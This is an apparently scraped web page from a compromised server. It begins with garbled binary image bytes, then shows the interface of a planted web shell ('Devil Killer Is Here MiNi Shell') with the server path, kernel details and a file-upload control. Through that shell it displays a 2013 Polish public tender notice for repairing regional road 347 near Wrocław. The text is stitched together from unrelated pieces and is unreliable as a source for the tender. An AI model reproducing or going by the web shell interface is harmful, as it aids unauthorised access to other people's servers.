JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130423/160220-N-2013.html

<p class="kh_header"><b>Wrocław: Remont drogi wojewódzkiej nr 347 odcinkami. CPV 45233142-6</b><br>
<b>Numer ogłoszenia: 160220 - 2013; data zamieszczenia: 23.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Służba Dróg i Kolei we Wrocławiu , ul. Krakowska 28, 50-425 Wrocław, woj. dolnośląskie, tel. 071 39 17 103, 39 17 104, faks 071 3917105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dsdik.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi wojewódzkiej nr 347 odcinkami. CPV 45233142-6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont drogi wojewódzkiej nr 347 odcinkami.
Zakres przewidziany w zamówieniu: 
I.  Odcinek w km  3+591 - 4+208 
Remont drogi rozpoczyna się w km 3+591, przechodzi przez   miejscowość Mokronos Dolnyi kończy na km 4+208 . Szerokość jezdni wynosi 6,3 m. Jezdnia bitumiczna  skoleinowana, spękana siatkowo . Pobocza gruntowe  szerokości 1,2 - 1,5 m. W miejscowości Mokronos Dolny jest jednostronnie wykonany chodnik
z kostki betonowej , oraz ściek z jednorzędowej kostki betonowej.                              
Remont drogi obejmować będzie :
  1. Frezowanie uszkodzonej jezdni:
      - 4,0 cm  na złączeniu nowo wykonanej  z  istniejącą.
      - 4,0 cm na powierzchni zjazdów z drogi głównej , zatoki , przepustu .         
      - 12  cm na całej szerokości jezdni.
      Frez zostanie wykorzystana do utwardzenia poboczy.
  2. Rozebranie i oczyszczenie nawierzchni z kostki kamiennej. Wywóz materiału na Oddział       drogowy w Cieszycach. Wykonawca we własnym zakresie wykona pryzmy z kostki .                                           
  3. Rozebranie opornika kamiennego ,  oczyszczenie, wywóz na Odział drogowy do Cieszyc .
      Wykonawca we własnym zakresie wykona pryzmy z przywiezionego materiału .
  4. Rozebranie kostki betonowej jednorzędowej (odcinkami), oczyszczenie . Kostka betonowa do  ponownego wbudowania .
  5. Rozebranie  ław pod ściek  z kostki betonowej .Wywóz materiału z rozbiórki z transportem i kosztami składowania.
  6. Ułożenie  ławy  pod ściek z kostki betonowej z betonu C 16/20 . 
  7. Ułożenie ścieku z kostki betonowej na podsypce cementowo - piaskowej odcinkami.
      Materiał z odzysku . 
   8. Rozebranie nawierzchni z kostki kamiennej ,oczyszczenie . Kostka kamienna do ponownego wbudowania . 
   9. Rozebranie  ławy betonowej  z wywozem materiału z rozbiórki i kosztami składowania .
 10. Ułożenie ławy  z betonu C16/20 pod nawierzchnię z kostki kamiennej .
 11. Wykonanie nawierzchni z kostki kamiennej (14-18)/20 cm .Kostka kamienna z odzysku .
 12. Wykonanie  koryta grunt kat. IV z transportem urobku i kosztami składowania. 
 13. Wykonanie stabilizacji 1,5-2,5 M Pa po 7 dniach grubości 20 cm dowożonej z wytwórni betonów.           
 14. Wykonanie warstwy podbudowy z kruszywa kamiennego łamanego 0/31,5 mm . 
 15. Wykonanie podbudowy bitumicznej z betonu asfaltowego AC 22P dla KR 5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczanie walcami drogowymi wraz z  niezbędnym oczyszczeniem i skropieniem . Grubość warstwy po  zagęszczeniu układanej dwuwarstwowo 14 cm (2X7). 
 16. Wykonanie warstwy wiążącej z betonu asfaltowego AC 16 W dla KR 5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczanie walcami drogowymi wraz z niezbędnym oczyszczeniem i skropieniem .Grubość warstwy po  zagęszczeniu 7 cm.
 17. Wykonanie warstwy ścieralnej z mieszanki SMA 11 dla KR5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczanie walcami drogowymi oraz niezbędne oczyszczenie i skropienie. Grubość warstwy po zagęszczeniu 4 cm .
 18. Wykonanie  zjazdów  przez ułożenie frezu (z odzysku)z zagęszczeniem .
 19. Wykonanie ścinki  poboczy z transportem urobku samochodami na składowisko wraz z kosztami składowania. 
 20. Uzupełnienie poboczy  frezowiną (odzysk) z zagęszczeniem .
 21. Odmulenie rowów głębokość 0,3 m wraz z wywozem i kosztami składowania . 
 22.  Regulacji pionowej  istniejących kratek ściekowych z oczyszczeniem.
 23. Wycinka  krzaków o rzadkiej gęstości wraz z mechanicznym i rozplantowanie wiórów.
 24. Wykonanie oznakowania poziomego cienkowarstwowego farbą akrylową.
 25. Oczyszczenie i udrożnieniu przepustów rurowych z namułu z wywozem i kosztami składowania .
 26. Ustawienie nowych słupków U-1a-na wszystkich oznakowanie km i hm nowe .
  Na tym odcinku wykonać  wgłębne korytowanie  następnie ułożenie warstw konstrukcyjnych nawierzchni w/g kosztorysu ofertowego. 
II.   Odcinek w km  5+400 -5+440 ; 6+015-7+240 . 
Remont drogi  rozpoczyna się w km 5+400 i kończy się w km 7+240. Szerokość jezdni wynosi od 6,1 m do 6,3 m. Jezdnia jest bitumiczna skoleinowana , spękana siatkowo.  Pobocza gruntowe zawyżone, o szerokości 
0,9 - 1,5 m. 
Remont drogi  obejmować będzie :
1. Frezowanie  uszkodzonej nawierzchni:
    -4 cm  na złączeniu nowo wykonanej nawierzchni bitumicznej z istniejącą,
    -4 cm  na zatokach autobusowych,
    -16 cm na całej szerokości jezdni,
    Frezowina zostanie wykorzystana do utwardzenia poboczy.
2. Mechaniczne wykonanie koryta  grunt kat. IV z transportem urobku i kosztami składowania.
3. Wykonanie stabilizacji 1,5-2,5 M Pa po 7 dniach grubości 20 cm dowożonej z wytwórni betonów.
4. Wykonanie recyklingu głębokiego  mieszanką MCE z dodatkiem cementu i emulsji  asfaltowej, grubość  warstwy po zagęszczeniu 25 cm ( średnia grubość warstw bitumicznych
    16 cm + dozowanie kruszywem  łamanym o uziarnieniu 0/31,5 mm grubości 9 cm). 
5. Wykonanie warstwy podbudowy z kruszywa kamiennego łamanego 0/31,5 mm.
6. Wykonanie podbudowy bitumicznej z betonu asfaltowego AC 22P dla KR 5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi.
    Grubość warstwy po zagęszczeniu 14 cm (wykonane 2X po 7 cm) wraz z niezbędnym  oczyszczeniem i skropieniem.
7. Wykonanie warstwy wiążącej z betonu asfaltowego AC 16 W dla KR 5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi.
    Grubość warstwy po zagęszczeniu 7 cm wraz z niezbędnym oczyszczeniem i skropieniem.
8. Wykonanie warstwy ścieralnej z mieszanki SMA 11 dla KR 5 na całej długości. remontowanego odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi Grubość warstwy 
    po zagęszczeniu 4 cm wraz z oczyszczeniem i niezbędnym skropieniem.
9. Ścinka pobocza grubości 10 cm w grunt kat. IV z transportem urobku samochodami na składowisko wraz z kosztami składowania.
10.Uzupełnienie poboczy  frezowiną  z odzysku z niezbędnym zagęszczeniem.
11.Wykonanie zjazdów frezem ułożenie i zagęszczenie  (frez z odzysku).
12.Wykonanie pod zjazdami przepustów rurowych ze ściankami czołowymi dla rur o śr. 60 cm z betonu B-30 odtworzenie .
13.Odmulenie  rowu wraz z profilowaniem skarp z wywozem i kosztami składowania. 14.Wykonanie oznakowania poziomego cienkowarstwowego farbą akrylową , piktogramy kolorowe  grubowarstwowo.
15.Oczyszczenie z namułu przepustów rurowych o średnicy 0,6 m . Stopień zanieczyszczenia 100% wraz z wywozem i kosztami składowania.
16. Ustawienie barier ochronnych stalowych jednostronnych H1W6 .Zakończenie barier elementami zawiniętymi oraz łącznikami skośnymi .
17.Wycinka krzaków o rzadkiej gęstości wraz z   mechanicznym rozdrobnieniem i rozplantowanie  wiórów.
18.Ustawienie nowych słupków U-1a - na wszystkich oznakowanie km i hm nowe. 
  Na odcinkach w km 5+400-5+440 , 6+015-6+065 , 7+040÷7+240 wykonać  wgłębne koryto i ułożyć warstwy  konstrukcyjne  w/g kosztorysu ofertowego . Natomiast na odcinku 6+065÷7+040   wykonać  recykling  głęboki mieszanką MCE z dodatkiem cementu i emulsji asfaltowej , warstwy konstrukcyjne  w/g kosztorysu ofertowego 
III .   Odcinek w km  8+215-9+145
  Remont drogi rozpoczyna się w km 8+215-9+145, przechodzi przez miejscowość Pietrzykowice . Szerokość jezdni zmienna od 6,3 m do 8,40 m. Jezdnia  bitumiczna  skoleinowana, spękana siatkowo miejscami zapadnięta . Pobocza gruntowe  szerokości 1,5 ÷ 2,0 m. W miejscowości Pietrzykowice jest jednostronnie wykonany chodnik z kostki betonowej .   
Remont drogi  obejmować będzie :
1. Frezowanie uszkodzonej jezdni:
    - 4 cm  na złączeniu nowo wykonanej z istniejącą,
    - 4 cm  na zjazdach , zatokach ,
    - 15 cm na całej szerokości jezdni .
    Frez zostanie wykorzystany do utwardzenia poboczy.
2. Rozebranie opornika kamiennego, oczyszczenie, wywóz na Oddział drogowy w Cieszycach ,hałdowanie sprzętem Wykonawcy .
3. Rozebranie nawierzchni z kostki kamiennej z oczyszczeniem (0,16-0,2)x0,2 m  , wywóz na Oddział drogowy w Cieszycach .Hałdowanie sprzętem Wykonawcy w Cieszycach .
4. Wykonanie koryta w gruncie kat. IV z transportem urobku  samochodami samowyładowczymi na  składowisko wraz z kosztami składowania .
5. Wykonanie stabilizacji cementem 1,5-2,5 M Pa po 7 dniach grubość po zagęszczeniu 20cm  dowożona wykonana z wytwórni betonów . 
6. Ułożenie podbudowy z kruszywa kamiennego łamanego  0/31,5mm po zagęszczeniu grubość 20 cm 
7.  Wykonanie podbudowy bitumicznej z betonu asfaltowego AC 22P dla KR 5 na całej długości remontowanego odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi.
    Grubość warstwy po zagęszczeniu 16 cm (wykonane 2x po 8 cm) wraz z niezbędnym oczyszczeniem i skropieniem .
8. Wykonanie warstwy wiążącej z betonu asfaltowego AC 16 W dla KR 5 na całej długości  remontowanego odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi
Grubość warstwy po zagęszczeniu 7 cm wraz z niezbędnym oczyszczeniem i skropieniem .
9. Wykonanie warstwy ścieralnej z mieszanki SMA 11 dla KR 5 na całej długości remontowanego  odcinka rozkładarką mas bitumicznych, zagęszczenie walcami drogowymi. Grubość warstwy po zagęszczeniu 4 cm wraz z oczyszczeniem i niezbędnym skropieniem .
10.Ścinka pobocza grubości 15 cm w grunt kat.IV z transportem urobku samochodami na    składowisko  wraz z kosztami składowania.
11.Uzupełnienie poboczy  frezowiną  z odzysku z niezbędnym zagęszczeniem.
12.Rozbiórkę i montaż azylu z tworzywa sztucznego .
13.Ustawienie nowego oznakowania pionowego na azylu.
14.Regulację pionową istniejących kratek ściekowych z ich oczyszczeniem.
15.Rozebranie odcinkami krawężników kamiennych . Krawężniki do odzysku.
16.Rozebranie ławy pod krawężniki kamienne z wywozem i kosztami składowania.
17. Wykonanie ławy  z betonu C16/20 krawężniki kamienne.
18.Ustawieniu krawężników kamiennych  na podsypce cementowo-piaskowej .Krawężnik z odzysku.
19.Rozebranie krawężników betonowych   z wywozem materiału z rozbiórki i kosztami składowania.
20.Rozebranie ławy betonowej  pod krawężniki betonowe z wywozem materiału z rozbiórki i kosztami składowania.
21.Wykonanie ławy  z betonu C16/20   pod krawężniki betonowe.
22.Ustawienie krawężników betonowych o wymiarach 15x30 na podsypce cementowo-piaskowej.
23.Wykonanie  ławy  z betonu C16/20  pod ściek z kostki kamiennej trzy rzędowej.
24.Wykonanie ścieku z  kostki kamiennej trzy rzędowej 20 x 18 cm .Kostka z odzysku.
25.Rozebranie chodnika z kostki betonowej grubości 8 cm , oczyszczenie . Kostka betonowa(odzysk 100%)do ponownego wbudowania.
26.Wykonanie wykopów liniowych koparkami w gruncie kat. IV o ściankach pionowych (przykanalik plus studzienka ściekowa) z wywozem i kosztami składowania (odtworzenie przykanalika)  .
27.Zasypywanie piaskiem wykopów liniowych o ściankach pionowych wraz z dostawą zasypki (przykanalik plus studzienka ściekowa) wraz z niezbędnym zagęszczeniem.
28.Wykonanie przykanalika z rur PCV na wcisk o średnicy zewnętrznej160 mm odtworzenie.
29.Wykonanie studzienki ściekowej ulicznej o średnicy 500 mm i kratki żeliwnej typu ciężkiego z   zawiasami (odtworzenie).
30.Ustawienie słupków hektometrowych U-1a - na wszystkich oznakowanie km i hm nowe.
31.Wykonanie oznakowania poziomego cienkowarstwowego farbą akrylową.
32.Odmulenie  rowu wraz z profilowaniem skarp , z transportem urobku samochodami na składowisko wraz z kosztami składowania.
33.Ścinka pobocza  w gruncie kategorii  IV z transportem urobku samochodami na składowisko wraz z kosztami składowania poza m. Pietrzykowice km 9+145÷10+461(dodatkowa ścinka dla zagospodarowania frezu).
34.Uzupełnienie poboczy:  frezowiną  z odzysku grubości 15cm z zagęszczeniem poza m.
     Pietrzykowice  ( km 9+145-10+461) .   
     Na odcinku tym wykonać  wgłębne koryto , ułożyć warstwy  konstrukcyjne w/g kosztorysu ofertowego.
                                                                                                                                                                                                                   
IV . OBOWIĄZKI WYKONAWCY         
 Przed przystąpieniem do robót bitumicznych Wykonawca ma obowiązek uzyskać akceptację recept na masy bitumiczne z laboratorium DSDiK we Wrocławiu.

V .   UWAGI DODATKOWE
Wbudowane materiały muszą odpowiadać Polskim Normom  lub wymogom określonym  w art.10 ust.2 ustawy Prawo Budowlane z dnia 07.07.1994 r.( Dz. U. z 1994r. Nr 89, poz.414 z późniejszymi zmianami).                                                                                                  Szczegółowy zakres rodzaj poszczególnych robót podają przedmiary oraz szczegółowa specyfikacja techniczna - stanowiące załączniki do SIWZ.      Roboty budowlane zostaną wykonane zgodnie z obowiązującymi przepisami.                 Wykonawca we własnym zakresie i w cenie oferty sporządzi i zatwierdzi tymczasowy  projekt organizacji ruchu , wyniesie go w teren oraz utrzyma w czytelności i kompletności przez cały czas trwania robót .                                                                                                         Urobek i gruz powstały podczas prowadzenia robót (oprócz frezowiny użytej do utwardzenia poboczy) Wykonawca zagospodarowuje we własnym zakresie zgodnie z ustawą o odpadach .       Okres gwarancji na wykonane roboty wynosi 3 lata od daty odbioru, na oznakowanie poziome cienkowarstwowe - 12 miesięcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 30.000,00 zł w formie zgodniej z art. 45 ust. 6 PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, gdy Wykonawca:
a) wykaże, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert wykonał minimum 2 zadania w zakresie budowy i lub przebudowy ilub remontu dróg, o wartości brutto minimum 4.000.000,00 zł  każde zadanie wraz z podaniem rodzaju i wartości, daty i miejsca wykonania, 
b)załączy dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu robót budowlanych i przedłożonych przez Wykonawcę poświadczeń innych dokumentów wg zasady spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, gdy Wykonawca:
a)wykaże dysponowanie minimum 1 osobą na stanowisku Kierownika Budowy , posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
b)wskaże podstawę do dysponowania tymi osobami,
c)oświadczy, że wykazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia wg zasady spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony i podpisany formularz oferty - Załącznik nr 1 do SIWZ.
b)Wypełniony i podpisany Kosztorys ofertowy - Załącznik nr 2 do SIWZ
c)Dowodami, o których mowa w wykazie robót budowlanych jest poświadczenie. 
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, jako dowód traktowane będą również inne dokumenty. W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W razie konieczności, szczególnie, gdy wykaz lub dowody budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były lub miały zostać wykonane o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
Wykonawca w miejsce poświadczeń, o których mowa powyżej może przedkładać dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 226, poz. 1817).
